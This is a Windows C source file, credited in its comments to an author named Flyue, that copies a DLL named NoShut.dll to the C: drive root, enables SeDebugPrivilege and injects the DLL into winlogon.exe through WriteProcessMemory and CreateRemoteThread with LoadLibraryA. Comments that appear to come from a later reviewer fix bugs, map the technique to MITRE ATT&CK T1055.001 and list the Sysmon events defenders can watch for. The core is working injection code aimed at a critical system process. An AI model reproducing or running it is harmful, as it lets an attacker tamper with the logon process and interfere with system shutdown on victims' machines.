#define EXENAME "winlogon.exe"
#define DLLNAME "C:\\NoShutDLL.dll"
//作者Flyue qq: 406088125 转载时请注明
#include <windows.h>
#include <stdio.h>
#include <TLHELP32.H>
DWORD ProcessNameToPId(LPCTSTR lpszProcess);
BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname);
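// Enable the privilege named by lpname in the access token of hprocess.
//
// hprocess: process whose token is adjusted (the caller in this file passes
//           the pseudo-handle from GetCurrentProcess()).
// lpname:   privilege name, e.g. SE_DEBUG_NAME.
//
// Returns TRUE only when the privilege was actually enabled, FALSE otherwise.
//
// AdjustTokenPrivileges() returns non-zero even when the token does not hold
// the requested privilege; in that case GetLastError() reports
// ERROR_NOT_ALL_ASSIGNED. Testing the return value alone therefore reports
// success for an unprivileged caller, so the last-error value is checked too.
BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES Privileges;
    LUID luid;
    BOOL ok = FALSE;

    if (!OpenProcessToken(hprocess, TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;

    // Resolve the privilege name to its LUID on the local system.
    if (LookupPrivilegeValue(NULL, lpname, &luid)) {
        Privileges.PrivilegeCount = 1;
        Privileges.Privileges[0].Luid = luid;
        Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (AdjustTokenPrivileges(hToken, FALSE, &Privileges, 0, NULL, NULL) &&
            GetLastError() == ERROR_SUCCESS) {
            ok = TRUE;
        }
    }

    // The token handle was leaked on every path in the original.
    CloseHandle(hToken);
    return ok;
}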
// Program entry point. In order, it:
//   1. copies NoShut.dll from the current directory to DLLNAME,
//   2. enables SeDebugPrivilege on its own token,
//   3. looks up the PID of EXENAME (winlogon.exe),
//   4. opens that process with PROCESS_ALL_ACCESS, allocates memory in it
//      and writes the DLL path there,
//   5. starts a remote thread whose start routine is LoadLibraryA and whose
//      argument is the written path.
// This is the DLL-injection pattern catalogued as MITRE ATT&CK T1055.001.
//
// Returns 0 after the "Success!" message box, 1 on any checked failure.
//
// NOTE(review), for defenders: each step leaves telemetry. With Sysmon
// deployed these are FileCreate (Event ID 11) for the DLL written to the
// drive root, ProcessAccess (Event ID 10) against winlogon.exe with an
// all-access mask, CreateRemoteThread (Event ID 8) with winlogon.exe as
// target, and ImageLoad (Event ID 7) of an unsigned DLL in winlogon.exe.
// Removing SeDebugPrivilege from accounts that do not need it makes step 2
// fail for them.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// Source path is relative to the current directory; FALSE means an existing
// file at DLLNAME is overwritten. The return value is not checked.
CopyFile("NoShut.dll", DLLNAME, FALSE);
char privilege[] = SE_DEBUG_NAME;
HANDLE hprocess;
// Pseudo-handle for this process; note it differs from hProcess (the target
// handle below) only by letter case.
hprocess = GetCurrentProcess();
if(!UpPrivilege(hprocess, privilege)) // begin privilege elevation
{
MessageBox(0, "UpPrivilege Error!", 0, MB_OK | MB_ICONERROR);
return 1;
}
char File_Name[MAX_PATH] = {0};
sprintf(File_Name, "%s", EXENAME);
DWORD ProcessPid = ProcessNameToPId(File_Name); // look up the PID from the process name
if(ProcessPid == 0)
{
MessageBox(0, "Not Find This File", 0, MB_OK | MB_ICONERROR);
return 1;
}
// The OpenProcess result is not checked; a failure here first becomes
// visible when VirtualAllocEx fails below.
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessPid);
DWORD dwSize;
char DllName[MAX_PATH];
sprintf(DllName, "%s", DLLNAME);
// strlen() excludes the terminating NUL, so only the path bytes are sized
// and written.
dwSize = strlen(DllName);
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if(lpBuf == NULL)
{
MessageBox(0, "VirtualAllocEx Error", 0, MB_OK | MB_ICONERROR);
CloseHandle(hProcess);
return 1;
}
if(!WriteProcessMemory(hProcess, lpBuf, DllName, dwSize, NULL))
{
// The remote allocation is not released on this path.
MessageBox(0, "WriteProcessMemory Error", 0, MB_OK | MB_ICONERROR);
CloseHandle(hProcess);
return 1;
}
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread(hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)pFunc,
lpBuf,
0,
NULL);
// hThread is never tested, so "Success!" is shown even when thread creation
// failed; hThread and hProcess are also not closed on this path.
MessageBox(0, "Success!", "OK", MB_OK | MB_ICONINFORMATION);
return 0;
}
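// Return the PID of the first process in a Toolhelp snapshot whose image
// name (PROCESSENTRY32.szExeFile) equals lpszProcess exactly, or 0 when no
// entry matches or the snapshot cannot be taken.
//
// The comparison is a case-sensitive strcmp on the bare file name, so it
// says nothing about the path or identity of the matched process, and only
// the first of several same-named processes is reported.
//
// Changes from the original: the snapshot handle is validated and closed on
// every path (it was leaked), the entry returned by Process32First is
// compared instead of skipped, and a NULL name is rejected.
DWORD ProcessNameToPId(LPCTSTR lpszProcess)
{
    DWORD pid = 0;
    PROCESSENTRY32 pe32;
    HANDLE tlhelp;

    if (lpszProcess == NULL)
        return 0;

    tlhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (tlhelp == INVALID_HANDLE_VALUE)
        return 0;

    // dwSize must be set before the first Process32First call.
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(tlhelp, &pe32)) {
        do {
            if (strcmp(pe32.szExeFile, lpszProcess) == 0) {
                pid = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(tlhelp, &pe32));
    }

    CloseHandle(tlhelp);
    return pid;
}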